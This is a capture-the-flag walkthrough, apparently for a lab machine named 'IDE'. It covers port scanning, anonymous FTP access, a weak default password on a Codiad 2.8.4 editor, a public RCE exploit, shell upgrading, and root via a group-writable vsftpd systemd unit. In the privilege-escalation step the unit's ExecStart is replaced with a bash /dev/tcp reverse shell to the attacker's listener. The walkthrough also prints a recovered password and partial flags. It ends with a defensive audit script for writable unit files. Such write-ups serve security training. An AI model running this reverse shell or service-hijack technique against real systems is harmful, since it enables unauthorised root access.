Recon:
┌──(neo㉿0xneoxploit)-[~]
└─$ rustscan -a 10.10.56.175 --ulimit 5000 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/neo/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.56.175:21
Open 10.10.56.175:80
Open 10.10.56.175:22
Open 10.10.56.175:62337
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -sV" on ip 10.10.56.175
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-27 01:17 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:17
Completed NSE at 01:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:17
Completed NSE at 01:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:17
Completed NSE at 01:17, 0.00s elapsed
Initiating Ping Scan at 01:17
Scanning 10.10.56.175 [4 ports]
Completed Ping Scan at 01:17, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:17
Completed Parallel DNS resolution of 1 host. at 01:17, 0.14s elapsed
DNS resolution of 1 IPs took 0.14s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:17
Scanning 10.10.56.175 [4 ports]
Discovered open port 22/tcp on 10.10.56.175
Discovered open port 21/tcp on 10.10.56.175
Discovered open port 80/tcp on 10.10.56.175
Discovered open port 62337/tcp on 10.10.56.175
Completed SYN Stealth Scan at 01:17, 0.19s elapsed (4 total ports)
Initiating Service scan at 01:17
Scanning 4 services on 10.10.56.175
Completed Service scan at 01:18, 11.63s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.56.175.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:18
NSE: [ftp-bounce 10.10.56.175:21] PORT response: 500 Illegal PORT command.
Completed NSE at 01:18, 7.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 1.50s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 0.00s elapsed
Nmap scan report for 10.10.56.175
Host is up, received echo-reply ttl 63 (0.17s latency).
Scanned at 2025-02-27 01:17:55 EST for 20s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.96.143
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC94RvPaQ09Xx+jMj32opOMbghuvx4OeBVLc+/4Hascmrtsa+SMtQGSY7b+eyW8Zymxi94rGBIN2ydPxy3XXGtkaCdQluOEw5CqSdb/qyeH+L/1PwIhLrr+jzUoUzmQil+oUOpVMOkcW7a00BMSxMCij0HdhlVDNkWvPdGxKBviBDEKZAH0hJEfexz3Tm65cmBpMe7WCPiJGTvoU9weXUnO3+41Ig8qF7kNNfbHjTgS0+XTnDXk03nZwIIwdvP8dZ8lZHdooM8J9u0Zecu4OvPiC4XBzPYNs+6ntLziKlRMgQls0e3yMOaAuKfGYHJKwu4AcluJ/+g90Hr0UqmYLHEV
| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBzKTu7YDGKubQ4ADeCztKu0LL5RtBXnjgjE07e3Go/GbZB2vAP2J9OEQH/PwlssyImSnS3myib+gPdQx54lqZU=
| 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ+oGPm8ZVYNUtX4r3Fpmcj9T9F2SjcRg4ansmeGR3cP
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
62337/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B4A327D2242C42CF2EE89C623279665F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.08 seconds
Raw packets sent: 8 (328B) | Rcvd: 23 (924B)
So we can see four ports open on the target machine, and ftp-anon reports "Anonymous FTP login allowed", so I'm going to try FTP first:
Accessing FTP
┌──(neo㉿0xneoxploit)-[~]
└─$ ftp 10.10.56.175
Connected to 10.10.56.175.
220 (vsFTPd 3.0.3)
Name (10.10.56.175:neo): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10922|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
229 Entering Extended Passive Mode (|||24419|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 114 4096 Jun 18 2021 .
drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..
drwxr-xr-x 2 0 0 4096 Jun 18 2021 ...
226 Directory send OK.
ftp> ls .
229 Entering Extended Passive Mode (|||59352|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls ..
229 Entering Extended Passive Mode (|||31772|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls ...
229 Entering Extended Passive Mode (|||27213|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 151 Jun 18 2021 -
226 Directory send OK.
ftp> cd ....
550 Failed to change directory.
ftp> cd ...
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||50399|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 151 Jun 18 2021 -
226 Directory send OK.
ftp> get -
local: - remote: -
229 Entering Extended Passive Mode (|||14897|)
150 Opening BINARY mode data connection for - (151 bytes).
100% |***************************************************************************************************************| 151 120.08 KiB/s 00:00 ETA
226 Transfer complete.
151 bytes received in 00:00 (0.86 KiB/s)
ftp> exit
221 Goodbye.
After logging into FTP, we can see there is a directory named "..." and inside it a file named "-", so I downloaded that to my local machine first; let's see what's inside:
┌──(neo㉿0xneoxploit)-[~]
└─$ file -
^C
┌──(neo㉿0xneoxploit)-[~]
└─$ mv - ide
┌──(neo㉿0xneoxploit)-[~]
└─$ file ide
ide: ASCII text
┌──(neo㉿0xneoxploit)-[~]
└─$ cat ide
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
Since most commands treat a filename of "-" as "read standard input" (which is why 'file -' just sat waiting and had to be interrupted; 'file ./-' would also have worked), I renamed it to ide, after the challenge name, and got this message.
So let's look at the other ports.
Port 80
There is nothing more than the default Apache page.
Port 62337
Here we have a Codiad 2.8.4 login page, and given the message we found on the FTP server we can use the username john and try some default passwords such as "password" and so on.
And yes, it worked (after five tries :3, because the username is case sensitive and "John" needs to be "john").
Now logged into Codiad, I saw nothing interesting for the next step, so I googled "Codiad 2.8.4" and quickly found a Codiad Remote Code Execution exploit.
So I'm going to try that and see if it works:
It worked and we are in.
So I went to /home/drac and tried to cat user.txt, but it said permission denied. I had to look through a writeup, where they inspected the bash history file (learned something new); there I could see a password, and then I tried su drac.
That didn't work either, because I got an error saying:
www-data@ide:/home/drac$ su drac
su drac
su: must be run from a terminal
So after googling I found this. The command:
python3 -c 'import pty; pty.spawn("/bin/bash")'
What It Does:
- python3 -c: Runs the given Python code as a one-liner from the command line.
- import pty: Imports the pty (pseudo-terminal) module in Python.
- pty.spawn("/bin/bash"):
  • Calls pty.spawn() to start a new interactive shell (/bin/bash).
  • It connects the standard input/output of the Python process to a pseudo-terminal, effectively upgrading a simple shell to a fully interactive shell.
Common Use Cases:
• Upgrading a shell: If you have a limited shell (e.g., a reverse shell with minimal capabilities), running this command can give you a fully interactive terminal.
• Bypassing input/output restrictions: Some restricted shells may have disabled interactive features, and using pty.spawn() can help restore full functionality.
• Testing pseudo-terminal interactions: Useful for debugging interactive programs that expect a real terminal.
Ethical Considerations:
- This is often used in penetration testing or ethical hacking (e.g., upgrading a reverse shell in a CTF or Red Team scenario).
- Running this command in an unauthorized environment (such as bypassing security restrictions) may violate policies or laws.
So I tried it and it worked:
www-data@ide:/home/drac$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ide:/home/drac$ su drac
su drac
Password: Th3dRaCULa1sR3aL
drac@ide:~$ ls
lsca
user.txt
drac@ide:~$ cat user.txt
cacat user.txt
Command 'cacat' not found, did you mean:
command 'acat' from deb atool
command 'pacat' from deb pulseaudio-utils
command 'chcat' from deb policycoreutils-python-utils
command 'ccat' from deb ccrypt
command 'cdcat' from deb cdcat
Try: sudo apt install <deb name>
drac@ide:~$ cat user.txt
cat user.txt
02930d21a8eb009f6**********
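As an added example (not part of the original writeup), this Python script shows why su refused to run from the Codiad web shell and what the pty trick changes: a child shell runs the same "is stdin a terminal?" probe, once with an ordinary pipe on stdin (the web-shell situation) and once with the slave side of a pseudo-terminal, which is what pty.spawn("/bin/bash") arranges for the whole shell. The helper name and the probe are assumptions of the example.

```python
import os
import subprocess

# Added example, not from the original writeup: why `su` refused to run from the
# Codiad web-shell (stdin was a pipe, not a terminal) and why a pseudo-terminal
# fixes it. The helper name below is our own.

# POSIX test run inside the child shell: is file descriptor 0 a terminal?
PROBE = '[ -t 0 ] && echo tty || echo notty'


def stdin_is_tty_in_child(use_pty: bool) -> bool:
    """Spawn a child shell and report whether it sees a terminal on stdin."""
    if use_pty:
        # Allocate a pseudo-terminal pair and give the child the slave end as
        # stdin; pty.spawn("/bin/bash") does the same for a whole shell and
        # also pumps bytes between the master end and our real stdin/stdout.
        master_fd, slave_fd = os.openpty()
        try:
            out = subprocess.run(["sh", "-c", PROBE], stdin=slave_fd,
                                 stdout=subprocess.PIPE, check=True).stdout
        finally:
            os.close(master_fd)
            os.close(slave_fd)
    else:
        # The web-shell case: stdin is an ordinary pipe, so isatty(0) is false
        # and programs like su bail out with "must be run from a terminal".
        out = subprocess.run(["sh", "-c", PROBE], stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE, check=True).stdout
    return out.strip() == b"tty"


if __name__ == "__main__":
    print("pipe as stdin -> child sees a tty:", stdin_is_tty_in_child(False))
    print("pty  as stdin -> child sees a tty:", stdin_is_tty_in_child(True))
```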
Root.txt
For privesc I'm going to use linPEAS (my first time using it). First let's download linPEAS, a very useful enumeration script, to our own system, then transfer it to the target and let it look for possible vulnerabilities. To do this, from our own system, let's run the command:
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250223-a8d560c8/linpeas.sh
Then host it from your own machine and download it to the victim machine.
ON YOUR MACHINE:
sudo python3 -m http.server 8000
ON THE IDE REVERSE SHELL:
drac@ide:~$ wget http://10.14.96.143:8000/linpeas.sh
wget http://10.14.96.143:8000/linpeas.sh
--2025-02-27 09:08:55-- http://10.14.96.143:8000/linpeas.sh
Connecting to 10.14.96.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 840082 (820K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 820.39K 732KB/s in 1.1s
2025-02-27 09:08:57 (732 KB/s) - ‘linpeas.sh’ saved [840082/840082]
drac@ide:~$ ls
ls
linpeas.sh user.txt
drac@ide:~$ chmod +x linpeas.sh
chmod +x linpeas.sh
drac@ide:~$ ./linpeas.sh
./linpeas.sh
LinPEAS-ng by carlospolop
And in the linPEAS output we can see this:
╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
Group drac:
/lib/systemd/system/vsftpd.service
Let's look at what the vsftpd service runs; linPEAS highlights this file in colour because our group can write to it.
drac@ide:~$ cat /etc/systemd/system/multi-user.target.wants/vsftpd.service
cat /etc/systemd/system/multi-user.target.wants/vsftpd.service
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target
I tried to edit the service file and got an error:
drac@ide:~$ nano /etc/systemd/system/multi-user.target.wants/vsftpd.service
nano /etc/systemd/system/multi-user.target.wants/vsftpd.service
Error opening terminal: unknown.
Since port 22 was open, I logged in as drac over SSH instead, and from there nano worked. Now, with write access to the unit file, we can edit the service as we like. For example, let's send a shell back to our listener on port 4444:
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.14.96.143/4444 0>&1'   <- the line I edited
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target
And yes, we got root and could read /root/root.txt.
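As an added defensive check (not part of the original writeup), this Python script looks for the weakness linPEAS reported: unit files under the systemd directories that a non-root group, or anyone, can write, and lists what each such unit would execute as root. The directory list, function names and the remediation comment are assumptions of the example.

```python
import os
import re
import stat
from typing import List

# Added example, not from the original writeup: audits for the misconfiguration
# linPEAS flagged above (a systemd unit file writable by a non-root group). Whoever
# can edit a unit runs commands as root at the next (re)start. Names are our own.
UNIT_DIRS = ["/etc/systemd/system", "/lib/systemd/system", "/usr/lib/systemd/system"]

def unit_file_findings(mode: int, uid: int, gid: int) -> List[str]:
    """Return the reasons a unit file with this mode/owner is unsafe (empty = fine)."""
    findings = []
    if uid != 0:
        findings.append(f"owned by uid {uid}, not root")
    if mode & stat.S_IWGRP and gid != 0:  # the root group itself is not flagged
        findings.append(f"group-writable by gid {gid} (non-root group)")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

def exec_start(unit_text: str) -> List[str]:
    """Extract every ExecStart= value, i.e. what runs as root if the file is edited."""
    return re.findall(r"^ExecStart=(.*)$", unit_text, flags=re.MULTILINE)

def audit_unit_dirs(dirs=UNIT_DIRS) -> List[str]:
    """Walk the unit directories and return one report line per unsafe unit file."""
    report = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            try:
                st = os.stat(path)  # symlinks are followed, so the real unit file is checked
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            problems = unit_file_findings(st.st_mode, st.st_uid, st.st_gid)
            if problems:
                with open(path, errors="replace") as fh:
                    cmds = exec_start(fh.read())
                report.append(f"{path}: {', '.join(problems)}; ExecStart={cmds}")
    return report

if __name__ == "__main__":
    # Fix for each hit: chown root:root FILE; chmod 644 FILE; systemctl daemon-reload
    print("\n".join(audit_unit_dirs()) or "no writable unit files found")
```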